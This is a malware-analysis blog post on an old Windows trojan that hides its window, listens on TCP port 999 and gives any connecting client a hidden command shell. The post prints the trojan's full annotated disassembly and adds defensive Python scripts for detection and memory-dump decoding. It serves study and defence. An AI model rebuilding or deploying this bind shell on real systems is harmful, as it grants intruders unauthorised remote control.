
minim trojan analysis

Date: 2023-02-22 01:37:42

Yet another rather basic trojan analysis, and a very old trojan at that, so please don't laugh. A journey of a thousand miles begins with a single step, and I am taking it slowly, heh. The trojan can be logged into remotely with telnet.

Basic information

Report name: mini trojan analysis

Author:

Report updated:

Sample discovered: .09.11

Sample type:

Sample file size / change in length of infected files:

Sample MD5:

Sample SHA1:

Packer:

Systems possibly affected:

Related vulnerabilities:

Known detection names:

Overview

Remote-login trojan (a bind shell)

Network symptoms

Listens on port 999

Detailed analysis / functionality

1. Hide the window

2. Bind port 999

3. Listen and wait for a client connection request

4. Accept the client connection

5. Remote login (the client is handed a command shell)

Prevention and remediation

Configure the firewall (block unsolicited inbound connections, here to TCP port 999) and pay attention to antivirus alerts.
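As an added example, not code from the original post, the following Python script shows the host-side check that the prevention advice implies. It takes text shaped like `netstat -ano` output together with a process table, flags any process listening on port 999, lists the remote ends connected to it, and looks for a cmd.exe child of that process, which is the trace the CreateProcessW step of this trojan leaves behind. All addresses, PIDs and the image name minim.exe are constructed for the example.

```python
"""Host-side triage for a bind-shell backdoor of the kind described above.

Added example, not part of the original post. It runs over constructed text
shaped like `netstat -ano` output plus a constructed process table, so it
works offline; on a real Windows host you would feed it the live output.
The image name minim.exe and all PIDs/addresses are made up.
"""
import re
from dataclasses import dataclass, field

SUSPECT_PORT = 999                       # the port the sample binds
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# Constructed sample, not captured from a real host.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:999            0.0.0.0:0              LISTENING       4120
  TCP    10.0.0.5:999           10.0.0.9:51234         ESTABLISHED     4120
  TCP    10.0.0.5:49700         52.1.2.3:443           ESTABLISHED     2200
  UDP    0.0.0.0:5353           *:*                                    1340
"""

# Constructed process table: pid -> (image name, parent pid).
PROCESS_SAMPLE = {
    912:  ("svchost.exe", 700),
    1340: ("svchost.exe", 700),
    2200: ("chrome.exe", 1800),
    3000: ("explorer.exe", 1),
    4120: ("minim.exe", 3000),   # hypothetical name for the sample
    4180: ("cmd.exe", 4120),     # shell whose stdio is the accepted socket
}

TCP_LINE = re.compile(
    r"^\s*TCP\s+(?P<laddr>\S+):(?P<lport>\d+)\s+(?P<raddr>\S+):(?P<rport>\d+)"
    r"\s+(?P<state>[A-Z_]+)\s+(?P<pid>\d+)\s*$")


@dataclass
class Finding:
    pid: int
    image: str
    port: int
    peers: list = field(default_factory=list)           # remote ends connected to the port
    shell_children: list = field(default_factory=list)  # (pid, image) of spawned shells


def parse_tcp_rows(text):
    """Return one dict per TCP row; the header and UDP rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = TCP_LINE.match(line)
        if m:
            d = m.groupdict()
            d["lport"], d["rport"], d["pid"] = int(d["lport"]), int(d["rport"]), int(d["pid"])
            rows.append(d)
    return rows


def find_bind_shells(netstat_text, procs, port=SUSPECT_PORT):
    """Flag every process listening on `port`, with its connected peers and any
    shell it has spawned (the parent/child link is what a bind shell cannot hide)."""
    rows = parse_tcp_rows(netstat_text)
    findings = []
    for r in rows:
        if r["state"] != "LISTENING" or r["lport"] != port:
            continue
        image = procs.get(r["pid"], ("<unknown>", None))[0]
        f = Finding(pid=r["pid"], image=image, port=port)
        f.peers = [f"{x['raddr']}:{x['rport']}" for x in rows
                   if x["pid"] == r["pid"] and x["lport"] == port and x["state"] == "ESTABLISHED"]
        f.shell_children = [(cpid, img) for cpid, (img, ppid) in procs.items()
                            if ppid == r["pid"] and img.lower() in SHELL_IMAGES]
        findings.append(f)
    return findings


if __name__ == "__main__":
    for f in find_bind_shells(NETSTAT_SAMPLE, PROCESS_SAMPLE):
        print(f"PID {f.pid} ({f.image}) listens on {f.port}; "
              f"peers={f.peers}; shells={f.shell_children}")
```

The port number is only a starting point: a rebuilt sample could bind any port, which is why the script also reports the process that owns the listener and the shell it spawned; a listener whose child is cmd.exe is suspicious on any port.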

Annotated disassembly of wmain (IDA listing):

.text:00411410 wmain proc near ; CODE XREF: j_wmainj
.text:00411410
.text:00411410 var_504 = byte ptr -504h
.text:00411410 CommandLine = word ptr -440h
.text:00411410 StartupInfo = _STARTUPINFOW ptr -238h
.text:00411410 Dst = dword ptr -1ECh
.text:00411410 hObject = dword ptr -1E8h
.text:00411410 addrlen = dword ptr -1D4h
.text:00411410 name = sockaddr ptr -1C8h
.text:00411410 var_1B0 = dword ptr -1B0h
.text:00411410 s = dword ptr -1A4h
.text:00411410 WSAData = WSAData ptr -198h
.text:00411410 var_4 = dword ptr -4
.text:00411410
.text:00411410 push ebp
.text:00411411 mov ebp, esp
.text:00411413 sub esp, 504h
.text:00411419 push ebx
.text:0041141A push esi
.text:0041141B push edi
.text:0041141C lea edi, [ebp+var_504]
.text:00411422 mov ecx, 141h
.text:00411427 mov eax, 0CCCCCCCCh
.text:0041142C rep stosd ; debug-build stack fill
.text:0041142E mov eax, __security_cookie
.text:00411433 xor eax, ebp
.text:00411435 mov [ebp+var_4], eax ; stack cookie
.text:00411438 mov esi, esp

Hide the window

.text:0041143A push 0 ; nCmdShow (SW_HIDE)
.text:0041143C push 0 ; hWnd
.text:0041143E call ds:__imp__ShowWindow@8 ; ShowWindow(x,x)

Initialise data

.text:00411444 cmp esi, esp
.text:00411446 call j__RTC_CheckEsp ; run-time ESP consistency check inserted by MSVC /RTC (debug build)
.text:0041144B push 10h ; Size
.text:0041144D push 0 ; Val
.text:0041144F lea eax, [ebp+Dst]
.text:00411455 push eax ; Dst
.text:00411456 call j__memset ; zero the PROCESS_INFORMATION (Dst)
.text:0041145B add esp, 0Ch
.text:0041145E push 44h ; Size
.text:00411460 push 0 ; Val
.text:00411462 lea eax, [ebp+StartupInfo]
.text:00411468 push eax ; Dst
.text:00411469 call j__memset ; zero the STARTUPINFOW
.text:0041146E add esp, 0Ch
.text:00411471 push 0FFh ; Size
.text:00411476 push 0 ; Val
.text:00411478 lea eax, [ebp+CommandLine]
.text:0041147E push eax ; Dst
.text:0041147F call j__memset ; zero the command-line buffer
.text:00411484 add esp, 0Ch
.text:00411487 mov esi, esp
.text:00411489 push 1FEh ; nSize
.text:0041148E lea eax, [ebp+CommandLine]
.text:00411494 push eax ; lpBuffer
.text:00411495 push offset Name ; lpName ("COMSPEC")

The COMSPEC variable has the form COMSPEC=C:\ and holds the path of the command interpreter; this call retrieves it.

.text:0041149A call ds:__imp__GetEnvironmentVariableW@12 ; GetEnvironmentVariableW(x,x,x)
.text:004114A0 cmp esi, esp
.text:004114A2 call j__RTC_CheckEsp
.text:004114A7 mov esi, esp
.text:004114A9 lea eax, [ebp+WSAData]

Winsock initialisation

.text:004114AF push eax ; lpWSAData
.text:004114B0 push 202h ; wVersionRequested (Winsock 2.2)
.text:004114B5 call ds:__imp__WSAStartup@8 ; WSAStartup(x,x)
.text:004114BB cmp esi, esp
.text:004114BD call j__RTC_CheckEsp
.text:004114C2 mov esi, esp

Create the socket

.text:004114C4 push 0 ; dwFlags
.text:004114C6 push 0 ; g
.text:004114C8 push 0 ; lpProtocolInfo
.text:004114CA push 6 ; protocol (IPPROTO_TCP)
.text:004114CC push 1 ; type (SOCK_STREAM)
.text:004114CE push 2 ; af (AF_INET)
.text:004114D0 call ds:__imp__WSASocketW@24 ; WSASocketW(x,x,x,x,x,x)
.text:004114D6 cmp esi, esp
.text:004114D8 call j__RTC_CheckEsp
.text:004114DD mov [ebp+s], eax ; listening socket
.text:004114E3 mov eax, 2
.text:004114E8 mov [ebp+name.sa_family], ax ; AF_INET
.text:004114EF mov dword ptr [ebp+name.sa_data+2], 0 ; sin_addr = INADDR_ANY (0.0.0.0)
.text:004114F9 mov esi, esp
.text:004114FB push 999 ; hostshort
.text:00411500 call ds:__imp__htons@4 ; htons(x)
.text:00411506 cmp esi, esp
.text:00411508 call j__RTC_CheckEsp
.text:0041150D mov word ptr [ebp+name.sa_data], ax ; sin_port = htons(999)
.text:00411514 mov esi, esp

Bind port 999

.text:00411516 push 10h ; namelen (sizeof sockaddr_in)
.text:00411518 lea eax, [ebp+name]
.text:0041151E push eax ; name
.text:0041151F mov ecx, [ebp+s]
.text:00411525 push ecx ; s
.text:00411526 call ds:__imp__bind@12 ; bind(x,x,x)
.text:0041152C cmp esi, esp
.text:0041152E call j__RTC_CheckEsp
.text:00411533 mov esi, esp

Listen

.text:00411535 push 1 ; backlog
.text:00411537 mov eax, [ebp+s]
.text:0041153D push eax ; s
.text:0041153E call ds:__imp__listen@8 ; listen(x,x)
.text:00411544 cmp esi, esp
.text:00411546 call j__RTC_CheckEsp
.text:0041154B mov [ebp+addrlen], 10h
.text:00411555 mov esi, esp

Accept the remote connection

.text:00411557 lea eax, [ebp+addrlen]
.text:0041155D push eax ; addrlen
.text:0041155E lea ecx, [ebp+name]
.text:00411564 push ecx ; addr
.text:00411565 mov edx, [ebp+s]
.text:0041156B push edx ; s
.text:0041156C call ds:__imp__accept@12 ; accept(x,x,x)
.text:00411572 cmp esi, esp
.text:00411574 call j__RTC_CheckEsp
.text:00411579 mov [ebp+var_1B0], eax ; accepted (client) socket
.text:0041157F mov [ebp+StartupInfo.cb], 44h
.text:00411589 xor eax, eax
.text:0041158B mov [ebp+StartupInfo.wShowWindow], ax ; SW_HIDE
.text:00411592 mov [ebp+StartupInfo.dwFlags], 101h ; STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
.text:0041159C mov eax, [ebp+var_1B0]
.text:004115A2 mov [ebp+StartupInfo.hStdError], eax ; point the new process's standard I/O handles at the accepted socket
.text:004115A8 mov eax, [ebp+var_1B0]
.text:004115AE mov [ebp+StartupInfo.hStdInput], eax
.text:004115B4 mov eax, [ebp+var_1B0]
.text:004115BA mov [ebp+StartupInfo.hStdOutput], eax
.text:004115C0 mov esi, esp
.text:004115C2 lea eax, [ebp+Dst]
.text:004115C8 push eax ; lpProcessInformation
.text:004115C9 lea ecx, [ebp+StartupInfo]

Create the process: launch the command interpreter with its standard input and output handles set to the accepted socket

.text:004115CF push ecx ; lpStartupInfo
.text:004115D0 push 0 ; lpCurrentDirectory
.text:004115D2 push 0 ; lpEnvironment
.text:004115D4 push 0 ; dwCreationFlags
.text:004115D6 push 1 ; bInheritHandles (TRUE, so the socket handle is inherited)
.text:004115D8 push 0 ; lpThreadAttributes
.text:004115DA push 0 ; lpProcessAttributes
.text:004115DC lea edx, [ebp+CommandLine]
.text:004115E2 push edx ; lpCommandLine (the COMSPEC value)
.text:004115E3 push 0 ; lpApplicationName
.text:004115E5 call ds:__imp__CreateProcessW@40 ; CreateProcessW(x,x,x,x,x,x,x,x,x,x)
.text:004115EB cmp esi, esp
.text:004115ED call j__RTC_CheckEsp
.text:004115F2 mov esi, esp

Wait for the process (the shell) to exit

.text:004115F4 push 0FFFFFFFFh ; dwMilliseconds (INFINITE)
.text:004115F6 mov eax, [ebp+Dst]
.text:004115FC push eax ; hHandle (hProcess)
.text:004115FD call ds:__imp__WaitForSingleObject@8 ; WaitForSingleObject(x,x)
.text:00411603 cmp esi, esp
.text:00411605 call j__RTC_CheckEsp
.text:0041160A mov esi, esp
.text:0041160C mov eax, [ebp+Dst]
.text:00411612 push eax ; hObject (hProcess)
.text:00411613 call ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:00411619 cmp esi, esp
.text:0041161B call j__RTC_CheckEsp
.text:00411620 mov esi, esp
.text:00411622 mov eax, [ebp+hObject]
.text:00411628 push eax ; hObject (hThread)
.text:00411629 call ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:0041162F cmp esi, esp
.text:00411631 call j__RTC_CheckEsp
.text:00411636 mov esi, esp ; process handles closed
.text:00411638 mov eax, [ebp+s]
.text:0041163E push eax ; s
.text:0041163F call ds:__imp__closesocket@4 ; closesocket(x)
.text:00411645 cmp esi, esp
.text:00411647 call j__RTC_CheckEsp
.text:0041164C mov esi, esp
.text:0041164E mov eax, [ebp+var_1B0]
.text:00411654 push eax ; s
.text:00411655 call ds:__imp__closesocket@4 ; closesocket(x)
.text:0041165B cmp esi, esp
.text:0041165D call j__RTC_CheckEsp
.text:00411662 mov esi, esp
.text:00411664 call ds:__imp__WSACleanup@0 ; WSACleanup()
.text:0041166A cmp esi, esp
.text:0041166C call j__RTC_CheckEsp ; sockets closed, Winsock DLL released
.text:00411671 xor eax, eax
.text:00411673 push edx
.text:00411674 mov ecx, ebp
.text:00411676 push eax
.text:00411677 lea edx, dword_4116A4
.text:0041167D call j__RTC_CheckStackVars
.text:00411682 pop eax
.text:00411683 pop edx
.text:00411684 pop edi
.text:00411685 pop esi
.text:00411686 pop ebx
.text:00411687 mov ecx, [ebp+var_4]
.text:0041168A xor ecx, ebp
.text:0041168C call j___security_check_cookie
.text:00411691 add esp, 504h
.text:00411697 cmp ebp, esp
.text:00411699 call j__RTC_CheckEsp
.text:0041169E mov esp, ebp
.text:004116A0 pop ebp
.text:004116A1 retn
.text:004116A1 wmain endp
.text:004116A1
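To make the two stack structures in the listing concrete, here is an added Python example (not from the original post) that rebuilds the 16-byte sockaddr_in and the 0x44-byte 32-bit STARTUPINFOW exactly as the disassembly writes them, using the constants from the listing (sa_family = 2, htons(999), sin_addr = 0, cb = 44h, dwFlags = 101h, wShowWindow = 0), and then decodes them the way you would when carving them out of a memory dump. The socket handle value 0x1F4 and the `looks_like_socket_backed_shell` heuristic are my own assumptions, not something the post states.

```python
"""Decode the two stack structures the sample fills in before CreateProcessW.

Added example, not code from the original post. The field offsets are those
of the 32-bit Win32 structures; the constants come from the disassembly.
The socket handle 0x1F4 is a constructed placeholder.
"""
import socket
import struct

AF_INET = 2
STARTF_USESHOWWINDOW = 0x001    # dwFlags bit 0
STARTF_USESTDHANDLES = 0x100    # dwFlags bit 8
SW_HIDE = 0
SIZEOF_STARTUPINFOW32 = 0x44    # cb the sample stores: 68 bytes on 32-bit Windows

# Byte offsets of the 32-bit STARTUPINFOW fields used below.
OFF_CB, OFF_DWFLAGS, OFF_WSHOWWINDOW = 0, 44, 48
OFF_HSTDINPUT, OFF_HSTDOUTPUT, OFF_HSTDERROR = 56, 60, 64


def build_sockaddr_like_sample(port):
    """Mirror the three stores in the listing: sa_family = 2, htons(port) into
    sa_data[0:2], and 0 into the dword at sa_data+2 (INADDR_ANY)."""
    buf = bytearray(16)                       # namelen = 10h
    struct.pack_into("<H", buf, 0, AF_INET)   # mov [name.sa_family], ax
    struct.pack_into("!H", buf, 2, port)      # htons(999) -> word ptr [name.sa_data]
    struct.pack_into("<I", buf, 4, 0)         # dword ptr [name.sa_data+2] = 0
    return bytes(buf)


def decode_sockaddr_in(buf):
    """Return (family, port, address) from a raw sockaddr_in."""
    family = struct.unpack_from("<H", buf, 0)[0]
    port = struct.unpack_from("!H", buf, 2)[0]   # port is stored in network byte order
    addr = socket.inet_ntoa(bytes(buf[4:8]))
    return family, port, addr


def build_startupinfo_like_sample(sock_handle):
    """Mirror the stores after accept(): cb = 44h, wShowWindow = 0, dwFlags = 101h,
    and the accepted socket copied into hStdError/hStdInput/hStdOutput."""
    buf = bytearray(SIZEOF_STARTUPINFOW32)    # memset(&StartupInfo, 0, 44h)
    struct.pack_into("<I", buf, OFF_CB, SIZEOF_STARTUPINFOW32)
    struct.pack_into("<H", buf, OFF_WSHOWWINDOW, SW_HIDE)
    struct.pack_into("<I", buf, OFF_DWFLAGS, STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW)
    for off in (OFF_HSTDERROR, OFF_HSTDINPUT, OFF_HSTDOUTPUT):
        struct.pack_into("<I", buf, off, sock_handle)
    return bytes(buf)


def decode_startupinfo(buf):
    """Pull the fields an analyst looks at out of a raw 32-bit STARTUPINFOW."""
    cb = struct.unpack_from("<I", buf, OFF_CB)[0]
    flags = struct.unpack_from("<I", buf, OFF_DWFLAGS)[0]
    show = struct.unpack_from("<H", buf, OFF_WSHOWWINDOW)[0]
    h_in, h_out, h_err = (struct.unpack_from("<I", buf, off)[0]
                          for off in (OFF_HSTDINPUT, OFF_HSTDOUTPUT, OFF_HSTDERROR))
    names = []
    if flags & STARTF_USESHOWWINDOW:
        names.append("STARTF_USESHOWWINDOW")
    if flags & STARTF_USESTDHANDLES:
        names.append("STARTF_USESTDHANDLES")
    return {"cb": cb, "flags": flags, "flag_names": names,
            "show_window": show, "std_handles": (h_in, h_out, h_err)}


def looks_like_socket_backed_shell(info):
    """Heuristic (my own, not from the post): a hidden child whose three standard
    handles are the same non-zero object is the shape of a shell wired to a socket."""
    h_in, h_out, h_err = info["std_handles"]
    return (info["flags"] & STARTF_USESTDHANDLES != 0
            and info["flags"] & STARTF_USESHOWWINDOW != 0
            and info["show_window"] == SW_HIDE
            and h_in == h_out == h_err != 0)


if __name__ == "__main__":
    sa = build_sockaddr_like_sample(999)
    print(sa.hex(), decode_sockaddr_in(sa))      # 03e7 at offset 2 is port 999
    si = build_startupinfo_like_sample(0x1F4)
    info = decode_startupinfo(si)
    print(info, looks_like_socket_backed_shell(info))
```

The same decoder works on any 16-byte sockaddr_in or 68-byte STARTUPINFOW pulled from a 32-bit process dump, so a rebuilt variant that binds a different port or a different interface is decoded just as easily as this sample's 0.0.0.0:999.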
